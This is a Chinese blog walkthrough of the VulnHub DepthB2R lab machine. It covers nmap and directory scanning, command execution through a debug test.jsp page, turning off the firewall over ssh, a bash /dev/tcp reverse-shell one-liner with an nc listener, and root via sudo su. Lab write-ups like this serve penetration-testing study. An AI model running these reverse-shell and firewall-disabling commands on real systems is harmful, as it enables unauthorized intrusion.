DepthB2R靶机渗透测试

最新推荐文章于 2024-08-04 13:56:10 发布
最新推荐文章于 2024-08-04 13:56:10 发布
阅读量121 收藏 1
点赞数 4
文章标签: web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_58786230/article/details/140897206
版权

一、靶机下载地址

https://www.vulnhub.com/entry/depth-1,213/

二、信息收集

1、主机发现

# 使用命令
nmap 192.168.145.0/24 -sn | grep -B 2 '00:0C:29:B9:A6:BD'

2、端口扫描

# 使用命令
nmap 192.168.145.186 -p- -sV

3、指纹识别

# 使用命令
whatweb 192.168.145.186:8080

4、目录扫描

# 使用命令
dirsearch -u "http://192.168.145.186:8080"

三、获取shell

1、访问靶机IP地址

2、 点击 manager webapp 会跳转一个登录框

3、 访问test.jsp文件,是一个debug页面

4、 输入ls -la /home,发现root 和bill用户

5、 可以执行命令,但是尝试反弹shell失败,查看进程,发现有ssh,之前没有扫到,可能是因为防火墙

# 使用命令
ps aux

6、 查看/etc,防火墙是开启状态

# 使用命令
ls -al /etc

7、 尝试关闭防火墙

# 使用命令
ssh bill@192.168.145.185 sudo ufw disable

8、 尝试反弹shell,kali开启监听

# 使用命令
nc -lvnp 1234

9、执行反弹shell的命令,成功获取到shell

# 使用命令
ssh bill@localhost bash -i >& /dev/tcp/192.168.145.146/1234 0>&1

四、提权

1、输入sudo -l命令查看可执行的命令,发现所有命令都可执行

2、输入sudo su命令进行提权,提权成功

果冻*果冻*
关注
  • 4
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
tomato靶机渗透测试
weixin_49340699的博客
07-28 1257
tomato靶机渗透测试环境工具流程总结 环境 靶机192.168.66.128 kali192.168.66.129 工具 netdiscover nmap dirb nc CVE-2017-6074本地提权漏洞利用脚本 流程 主机发现 netdiscover -i eth0 -r 192.168.66.0/24 端口扫描 nmap -sV -p- -T5 192.168.66.128 ftp不存在匿名登录 收集80端口信息 没有收获后用dirb目录爆破 爆破出目录http://192.168.6
Vulnhub靶机渗透测试 DC-8靶机
12-07
Vulnhub靶机渗透测试 DC-8靶机
VulnHub DepthB2R 靶机渗透
Shadow的博客
04-08 363
DepthB2R 靶机渗透 目标:得到root权限 作者:shadow 时间:2021-04-08 请注意:对于所有计算机,我已经使用VMware运行下载的计算机。我将使用Kali Linux作为攻击者机器。这里使用的技术仅用于学习教育目的,如果列出的技术用于其他任何目标,概不负责。 一、信息收集 主机ip为172.16.1.22 nmap -p- -A -T5 172.16.1.22 只开放了8080端口,我们看看是什么 二、web渗透 没什么发现,试试nikto扫描下 ni
DepthB2R靶机
最新发布
zdd1453691081的博客
08-04 183
【代码】DepthB2R靶机
DepthB2R靶机复现
weixin_52956666的博客
08-02 174
访问192.168.112.149:8080。靶机IP为192.168.112.149。输入ls -l /home查看用户。发现失败,感觉像是ssh服务被关闭。这个靶机比较友好,不需要进行设置。输入ls -l发现存在命令执行。sudo -l查看免密操作。拼接/test.jsp。尝试进行反弹shell。sudo su直接提权。在kali上开启监听。
lampiao靶机渗透测试
m0_56375711的博客
12-25 1548
lampiao靶机渗透测试。包括awvs、msf、脏牛漏洞提权的练习
DC-1靶机渗透测试
来日可期的博客
08-04 1864
SH文件大多是用于程序开发人员,这些文件都是Bash的应用程序非常重要,因为该应用程序主要使用脚本以及命令将被执行,使这个应用程序的工作。CMS:Drupal是开源CMS之一,Drupal是CMS内容管理系统,并且在世界各地使用,受到高度赞赏,Drupal可以作为开源软件免费使用,就是附带了cms的php开发框架。:/etc/passwd文件,系统用户配置文件,存储了系统中所有用户的基本信息,并且所有用户都可以对此文件执行读(r)操作。命令的选项之一,用于指定要搜索的文件名为 "flag4.txt"。
DC-1靶机渗透测试详细教程
啊醒的博客
05-04 5527
DC靶机系列渗透教程
VulnHub DC1靶机渗透测试
weixin_44614631的博客
08-25 925
对VulnHub DC1靶机进行渗透测试。最终,得到了四个flag和一个thefinalflag,共5个flag。有两个问题不是特别清楚,需要再进一步学习。 根据网络上两篇博文学习,总结。如果有版权问题,请联系我进行修改或删除...
DC-5靶机渗透测试
读书 买花 长大
03-14 1484
DC-5
web渗透测试靶机(新手)
05-07
Web渗透测试靶机是针对新手入门的网络安全学习平台,它模拟了实际的Web应用程序环境,让你可以在一个安全可控的环境中实践渗透测试技术。这个靶机通常包含一系列具有不同安全漏洞的Web应用,让学习者通过查找和利用...
Vulnhub靶机渗透测试 DC-3靶机
12-07
Vulnhub靶机渗透测试 DC-3靶机
Vulnhub靶机渗透测试 DC-7靶机
12-07
Vulnhub靶机渗透测试 DC-7靶机
Vulnhub靶机渗透测试 DC-9靶机
12-07
Vulnhub靶机渗透测试 DC-9靶机
web安全之简要sql注入
weixin_73185660的博客
08-01 949
举例:select * from users where id=-1 union select 1,group_concat(table_name),3,4 from information_schema.tables where table_schema='这里写数据库名称'如果是mysql5.0以上,则存在information_schema,其中存储所有数据库名,表名,列名的数据库,也相当于可以通过查询它获取指定数据库下面的表名或列名信息。如果是1=1,那么就是真且真,结果为真。
网络安全防御【IPsec VPN搭建】
miss_copper的博客
07-25 1625
防火墙的g0/0/0口默认的IP地址为192.168.0.1/24;但是我们需要在浏览器中打开FW2的web服务就需要将g0/0/0接口的IP地址修改为192.168.142.40/24与我们Clound中虚拟网卡通一个网段才行。20、将双机热备改成主备模式,通过内网的VPN设备构建一条到达分公司的IPsec VPN通道,保证10.0.2.0/24网段可以访问到192.168.1.0/24网段。登录成功之后需要修改你的密码才能进入防火墙的用户视图。IPsec策略协商成功!成功修改为主备模式!
构建网络安全的坚实基石:深入解析NIST与ISO 27001框架
2401_85341950的博客
08-03 529
网络安全框架是一套指南和最佳实践,用于帮助组织评估、设计、实施和维护其网络安全策略。这些框架通常包括识别、保护、检测、响应和恢复五个核心功能。
网络安全之不同阶段攻防手段(四)
子非渔
07-25 859
前面已经说过信息收集、扫描探测以及初始访问阶段的攻防手段,下面将说一下在攻击者获取到访问权限的情况下会接着如何进一步在网络中建立控制点、提权、横移以及完成攻击后的遗迹隐藏
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值